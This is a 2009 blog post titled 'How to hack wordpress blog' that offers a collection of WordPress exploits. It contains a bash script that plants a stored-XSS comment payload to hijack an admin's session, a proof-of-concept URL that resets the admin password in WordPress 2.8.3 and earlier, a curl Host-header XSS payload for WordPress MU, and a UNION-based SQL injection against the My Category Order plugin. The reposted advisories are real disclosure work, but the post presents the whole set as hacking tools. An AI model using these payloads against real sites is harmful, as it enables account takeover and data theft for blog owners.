How to hack wordpress blog
Friday, December 11, 2009Posted by
Admin
0 Comments
Here, is the wordpress webpage hacking even it is called wordpress hack...here we go
few exploits are as follows :
#!/bin/bash
echo "wp281.quickprz // iso^kpsbr"
SITE=$1
COMMENT=$2
MESSAGE="h4x0riZed by the superfreakaz0rz"
if [ "X$SITE" = "X" ]; then
echo "$0[postID]"
echo "f.e. $0 www.worstpress.eu"
exit
fi
if [ "X$POSTID" = "X" ]; then
POSTID=1
fi
echo "[+] building payload"
WHERE="title" # can also be 'content'
PATH="$SITE/wp-comments-post.php"
WHERE=`echo -n "$WHERE" | /usr/bin/od -t d1 -A n | /bin/sed 's/\\s\\s*/,/g' | /bin/sed 's/^,//'`
EVILURL="http://w.ch'onmouseover='document.getElementById(String.fromCharCode($WHERE)).value=this.innerHTML;document.getElementById(String.fromCharCode(112,117,98,108,105,115,104)).click();"
echo "[-] payload is $EVILURL for '$MESSAGE'"
EVILURL=`echo -n "$EVILURL" | /usr/bin/od -t x1 -A n | /usr/bin/tr " " %`
MESSAGE=`echo -n "$MESSAGE" | /usr/bin/od -t x1 -A n | /usr/bin/tr " " %`
RNDDATA=`/bin/date +%S%s`;
echo "[!] delivering data"
/usr/bin/curl -A "Quickprz" -d "author=$MESSAGE&email=kelly@hackforums.net&url=$EVILURL&comment=hi+there%5F+this+is+just+some+very+harmless+spam+$RNDDATA&submit=Submit+Comment&comment_post_ID=$POSTID" $PATH
echo "[X] all done. now wait for admin to mouse-over that name."
=============================================
- Release date: August 10th, 2009
- Discovered by: Laurent Gaffié
- Severity: Medium
=============================================
I. VULNERABILITY
-------------------------
WordPress <= 2.8.3 Remote admin reset password
II. BACKGROUND
-------------------------
WordPress is a state-of-the-art publishing platform with a focus on
aesthetics, web standards, and usability. WordPress is both free and
priceless at the same time. More simply, WordPress is what you use when
you want to work with your blogging software, not fight it.
III. DESCRIPTION
-------------------------
The way Wordpress handle a password reset looks like this:
You submit your email adress or username via this form /wp-login.php?action=lostpassword ;
Wordpress send you a reset confirmation like that via email:
"
Someone has asked to reset the password for the following site and username.
http://DOMAIN_NAME.TLD/wordpress
Username: admin
To reset your password visit the following address, otherwise just
ignore this email and nothing will happen
http://DOMAIN_NAME.TLD/wordpress/wp-login.php?action=rp&key=o7naCKN3OoeU2KJMMsag
"
You click on the link, and then Wordpress reset your admin password, and
sends you over another email with your new credentials.
Let's see how it works:
wp-login.php:
...[snip]....
line 186:
function reset_password($key) {
global $wpdb;
$key = preg_replace('/[^a-z0-9]/i', '', $key);
if ( empty( $key ) )
return new WP_Error('invalid_key', __('Invalid key'));
$user = $wpdb->get_row($wpdb->prepare("SELECT * FROM $wpdb->users WHERE user_activation_key = %s", $key));
if ( empty( $user ) )
return new WP_Error('invalid_key', __('Invalid key'));
...[snip]....
line 276:
$action = isset($_REQUEST['action']) ? $_REQUEST['action'] : 'login';
$errors = new WP_Error();
if ( isset($_GET['key']) )
$action = 'resetpass';
// validate action so as to default to the login screen
if ( !in_array($action, array('logout', 'lostpassword', 'retrievepassword', 'resetpass', 'rp', 'register', 'login')) && false === has_filter('login_form_' . $action) )
$action = 'login';
...[snip]....
line 370:
break;
case 'resetpass' :
case 'rp' :
$errors = reset_password($_GET['key']);
if ( ! is_wp_error($errors) ) {
wp_redirect('wp-login.php?checkemail=newpass');
exit();
}
wp_redirect('wp-login.php?action=lostpassword&error=invalidkey');
exit();
break;
...[snip ]...
You can abuse the password reset function, and bypass the first step and
then reset the admin password by submiting an array to the $key
variable.
IV. PROOF OF CONCEPT
-------------------------
A web browser is sufficiant to reproduce this Proof of concept:
http://DOMAIN_NAME.TLD/wp-login.php?action=rp&key[]=
The password will be reset without any confirmation.
V. BUSINESS IMPACT
-------------------------
An attacker could exploit this vulnerability to compromise the admin
account of any wordpress/wordpress-mu <= 2.8.3
VI. SYSTEMS AFFECTED
-------------------------
All
VII. SOLUTION
-------------------------
No patch aviable for the moment.
VIII. REFERENCES
-------------------------
http://www.wordpress.org
IX. CREDITS
-------------------------
This vulnerability has been discovered by Laurent Gaffié Laurent.gaffie{remove-this}(at)gmail.com
I'd like to shoot some greetz to securityreason.com for them great
research on PHP, as for this under-estimated vulnerability discovered by
Maksymilian Arciemowicz : http://securityreason.com/achievement_securityalert/38
X. REVISION HISTORY
-------------------------
August 10th, 2009: Initial release
XI. LEGAL NOTICES
-------------------------
The information contained within this advisory is supplied "as-is"
with no warranties or guarantees of fitness of use or otherwise.
I accept no responsibility for any damage caused by the use or
misuse of this information.
=============================================
INTERNET SECURITY AUDITORS alert 2009-004
- Original release date: December 3rd, 2008
- Last revised: March 10th, 2009
- Discovered by: Juan Galiana Lara
- Severity: 6.3/10 (CVSS scored)
=============================================
I. VULNERABILITY
-------------------------
WordPress MU < 2.7 'Host' HTTP Header Cross Site Scripting (XSS)
Vulnerability
II. BACKGROUND
-------------------------
WordPress MU, or multi-user, allows to run unlimited blogs with a
single install of wordpress. It is most famously used for
WordPress.com where it serves tens of millions of hits on hundreds of
thousands of blogs each day. Also is used in many other sites like
Harvard University and Le Monde.
III. DESCRIPTION
-------------------------
WordPress MU prior to version 2.7 fails to sanitize the Host header
correctly in choose_primary_blog function and is therefore prune to
XSS attacks.
Web Sites running in a name based virtual hosting setup are not
affected while they are not the default virtual host.
IV. PROOF OF CONCEPT
-------------------------
The snippet of vulnerable code:
In wp-includes/wpmu-functions.php, concretly in the function
choose_primary_blog:
1830 function choose_primary_blog() {
1831 global $current_user;
1832 ?>
1833 <table class="form-table">
1834 <tr>
1835 <th scope="row">php _e('Primary Blog'); ?>th>
1836 <td>
1837 php
1838 $all_blogs = get_blogs_of_user( $current_user->ID );
1839 if( count( $all_blogs ) > 1 ) {
1840 $primary_blog = get_usermeta($current_user->ID,
'primary_blog');
1841 ?>
1842 <select name="primary_blog">
1843 php foreach( (array) $all_blogs as $blog ) { ?>
1844 <option value='userblog_id
?>'php if( $primary_blog == $blog->userblog_id ) echo '
selected="selected"' ?>>http://domain.$blog->path
?>option>
1845 php } ?>
1846 </select>
1847 1848 } else {
1849 echo $_SERVER['HTTP_HOST']; <- HERE
1850 }
1851 ?>
1852 td>
1853 </tr>
1854 table>
1855 php
1856 }
The line 1849 contains the affected code "echo $_SERVER['HTTP_HOST'];"
and is possible to inject HTML and script code crafting HTTP Host header:
PoC:
$ curl -H "Cookie: my cookies here" -H "Host:
onload=alert(String.fromCharCode(88,83,83))>"
http://www.example.com/wp-admin/profile.php> tmp.html
$ firefox tmp.html
The javascript code will be executed in the context of the victim
browser, this can be exploited to steal cookies and escalate
privileges to administrator.
Tested with Wordpress MU 2.6.5, Apache 2.2 and Mozilla Firefox 3.0.6
V. BUSINESS IMPACT
-------------------------
The impact is the attacker can gain administrator privileges on the
application.
VI. SYSTEMS AFFECTED
-------------------------
Versions prior to 2.7 are affected
VII. SOLUTION
-------------------------
Upgrade to version 2.7 of wordpress multi-user. It can be downloaded
from http://mu.wordpress.org
VIII. REFERENCES
-------------------------
http://mu.wordpress.org
IX. CREDITS
-------------------------
This vulnerability has been discovered
by Juan Galiana Lara (jgaliana (at) isecauditors (dot) com).
X. REVISION HISTORY
-------------------------
December 03, 2008: Initial release
March 02, 2009: More details added
XI. DISCLOSURE TIMELINE
-------------------------
December 03, 2008: Vendor contacted
December 03, 2008: MU trunk code fixed
January 28, 2008: WordPress MU 2.7 released
March 10, 2009: Vulnerability published by
Internet Security Auditors (www.isecauditors.com)
XII. LEGAL NOTICES
-------------------------
The information contained within this advisory is supplied "as-is"
with no warranties or guarantees of fitness of use or otherwise.
Internet Security Auditors accepts no responsibility for any damage
caused by the use or misuse of this information.
###############################
# Source: WordPress Plugin: My Category Order <= 2.8 (mycategoryorder.php) / SQL Injection Vulnerability
# Download: http://wordpress.org/extend/plugins/my-category-order/
# No Dork
# Author: ManhLuat93 [at] hcegroup[dot]net
###############################
Errors appears only when you have admin control
Open mycategoryorder.php (Line 47-48):
if (isset($_GET['parentID']))
$parentID = $_GET['parentID'];
Fix:
if (isset($_GET['parentID']))
$parentID = intval($_GET['parentID']);
[+] Exploit [+]
http://localh0st/wp-admin/post-new.php?page=mycategoryorder&mode=act_OrderCategories&parentID=0'&idString=3,5,4,1
MySQL Query Error:
WordPress database error:
[You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '' ORDER BY term_order ASC' at line 1]
SELECT * FROM wp_terms t inner join wp_term_taxonomy tt on t.term_id = tt.term_id WHERE taxonomy = 'category' and parent = 0' ORDER BY term_order ASC
[+] http://localh0st/wp-admin/post-new.php?page=mycategoryorder&mode=act_OrderCategories&parentID=0 UNION SELECT 1,@@version,3,4,5,6,7,8,9,10,11--&idString=3,5,4,1
[+] What do you see ?
Labels:
Hacking
Subscribe to:
Post Comments (Atom)
